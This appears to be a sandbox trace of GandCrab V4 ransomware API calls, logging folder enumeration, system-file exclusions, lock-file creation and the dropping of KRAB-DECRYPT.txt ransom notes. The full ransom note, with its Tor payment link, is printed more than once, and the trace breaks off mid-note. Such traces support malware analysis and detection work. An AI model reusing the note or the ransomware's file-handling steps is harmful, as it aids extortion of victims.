lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt" [0101.110] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.111] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt.KRAB") returned 47 [0101.111] lstrlenW (lpString="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt") returned 42 [0101.111] lstrlenW (lpString=".txt") returned 4 [0101.111] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.111] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.111] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.111] lstrlenW (lpString="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt") returned 42 [0101.111] lstrlenW (lpString="C:\\Users\\Public\\Documents\\KRAB-DECRYPT.txt") returned 42 [0101.111] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.111] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.111] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.111] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.112] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.112] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.112] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.112] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0101.112] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0101.112] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0101.112] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0101.112] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.112] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.112] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.112] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.113] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.113] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.113] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\KRAB-DECRYPT.txt") returned 52 [0101.113] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0101.115] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.115] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.116] CloseHandle (hObject=0x434) returned 1 [0101.116] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.117] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.117] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x136)) [0101.117] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.117] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.117] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.117] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock") returned 58 [0101.117] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\documents\\my music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0101.122] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.122] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.123] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0101.123] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*") returned="C:\\Users\\Public\\Documents\\My Music\\*" [0101.123] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0101.123] CloseHandle (hObject=0x434) returned 1 [0101.123] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.123] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0101.123] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0101.123] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0101.123] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0101.123] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.124] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.124] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.124] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.124] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt") returned 55 [0101.125] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0101.126] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.126] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.127] CloseHandle (hObject=0x434) returned 1 [0101.127] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.127] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.128] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x145)) [0101.128] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.128] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.128] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.128] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock") returned 61 [0101.128] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\documents\\my pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0101.130] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.131] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.131] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0101.131] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*" [0101.131] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0101.131] CloseHandle (hObject=0x434) returned 1 [0101.132] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.132] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0101.132] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0101.132] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0101.132] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0101.132] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.133] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.133] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.133] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.133] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\\\KRAB-DECRYPT.txt") returned 53 [0101.133] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0101.134] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 